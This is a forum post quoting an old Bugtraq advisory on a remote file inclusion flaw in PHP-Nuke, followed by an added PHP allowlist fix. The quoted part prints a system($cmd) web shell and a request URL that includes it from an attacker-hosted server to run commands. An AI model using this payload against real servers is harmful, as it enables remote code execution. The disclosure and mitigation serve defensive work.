Quote"
From Bugtraq, by Handle Nopman [nopman@hackermail.com]
Hi All!
I've found a serious security flaw in PHP-Nuke.
It allows user to execute any PHP code.
The flaw is in the index.php's include file feature.
It allows including files like index.php?file=file
It prevents users including ..'s in URL's, but
it didn't prevent users from entering
http://-urls
Remember the PHP's remote get feature...
How to exploit:
Upload this file to some free web space provider or
setup your own server:
system($cmd);
?>
Then just requesting
http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
will execute ls -al command.
I will not upload the file anywhere to prevent too easy exploiting. (No script kiddies)
Vendor status:
I contacted the author on 28.12.2001 and he hasn't
replied.
Sincerely
"Nopman"
" unquote
Don't want to scare you in any way, but sounds interesting enough to investigate, I think. Just to let you know.
HFW
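
The quoted advisory describes a `file` parameter check that blocks `..` but still lets `http://` values through. The block below is an added example, not part of the post and not PHP-Nuke code: it resolves the parameter through an allowlist and a `realpath()` containment test instead of a blocklist. The function name `resolve_page()` and the demo directory are hypothetical.

```php
<?php
// Added example, not PHP-Nuke code. resolve_page() and the demo directory
// are hypothetical names chosen for illustration.

/**
 * Map a user-supplied ?file= value to a local script, or return null.
 */
function resolve_page(string $name, string $baseDir): ?string
{
    // Allowlist: plain names only. Dots, slashes, colons and NUL bytes fail here,
    // which covers "..", absolute paths and "http://" in a single rule.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() returns false for missing files and resolves symlinks,
    // so the containment test runs against the real location on disk.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . '.php');
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Demo with constructed inputs against a throwaway directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'include_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'news.php', "<?php echo 'news page';\n");

$samples = ['news', 'missing', '../config', '/etc/passwd',
            'http://example.invalid/x.php', "news\0.txt"];
foreach ($samples as $s) {
    $path = resolve_page($s, $dir);
    printf("%-34s %s\n", json_encode($s), $path === null ? 'rejected' : 'include ' . basename($path));
}

unlink($dir . DIRECTORY_SEPARATOR . 'news.php');
rmdir($dir);
```

Only `news` resolves; every other sample is rejected. Keeping `allow_url_include` off in `php.ini` (available since PHP 5.2, off by default) is a second layer if a check like this is ever bypassed.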